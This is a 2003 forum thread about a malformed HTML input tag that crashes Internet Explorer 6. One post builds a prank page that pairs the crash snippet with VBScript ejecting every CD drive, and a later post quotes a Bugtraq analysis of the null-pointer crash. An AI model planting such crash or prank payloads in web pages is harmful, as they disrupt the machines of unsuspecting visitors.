05-08-2003, 01:45 PM | #3 (permalink) |
Essen meine kurze Hosen
Location: NY Burbs
|
Not sure what code is in your box, but these 5 lines will crash IE6.
I left off the <'s and you can basically replace the word 'crash' with any unrecognized word. html> form> input type crash> /form> /html>
__________________
Out the 10Base-T, through the router, down the T1, over the leased line, off the bridge, past the firewall...nothing but Net. |
05-08-2003, 02:38 PM | #4 (permalink) | |
Crazy
Location: Fayetteville, AR
|
Quote:
|
|
05-08-2003, 02:57 PM | #5 (permalink) |
Insane
Location: here
|
Heh, combine this with the CD-drive open file and you get a CD-Opening, IE-Crashing home page... beginning carets removed of course...
Code:
html> SCRIPT language=VBScript> (PUTAOPENCARETHERE)!-- Set oWMP = CreateObject("WMPlayer.OCX.7" ) Set colCDROMs = oWMP.cdromCollection if colCDROMs.Count >= 1 then For i = 0 to colCDROMs.Count - 1 colCDROMs.Item(i).Eject Next ' cdrom End If --(PUTACLOSECARETHERE) /SCRIPT> form> input type crash> /form> /html> Or, to download this little bugger or see it live: click here, or right click there and hit save target as to save.
__________________
What 'chu talkin' 'bout, Willis? Last edited by gamer715; 05-08-2003 at 05:07 PM.. |
05-08-2003, 10:02 PM | #9 (permalink) |
Insane
Location: Dayton, NV
|
it only works(that ive seen) on IE6.0+
__________________
Raoul Duke: "I wouldn't dare go to sleep with you wandering around with a head full of acid, wanting to slice me up with that goddamn knife." Dr. Gonzo: "Who said anything about slicing you up, man. I just wanted to cut a little Z in your forehead." |
05-09-2003, 08:43 PM | #10 (permalink) |
Junkie
Location: North Hollywood
|
yep, that err fixed it , crashed alright.
buqtraq info. just for the heck of it -> IE tries to compare the type of the input field to "HIDDEN", to see if it should be rendered. When there is no type string, a null-pointer is used. mshtml.dll calls shlwapi.dll#158 @ 0x636f0037 with a pointer to a static unicode string "HIDDEN" and a null-pointer. shlwapi.dll#158 does a case-insensitive comparison of two unicode strings: it reads from address 0x0 because of the null-pointer and thus causes an exception. This is not exploitable, other then a DoS because there is no memory mapped @ 0x0 and even if you could load something there, you could only compare it to "HIDDEN" which gets you nowhere. Berend-Jan Wever ---- luckily you can just exit out of that function with a debugger |
Tags |
gotta, love |
|
|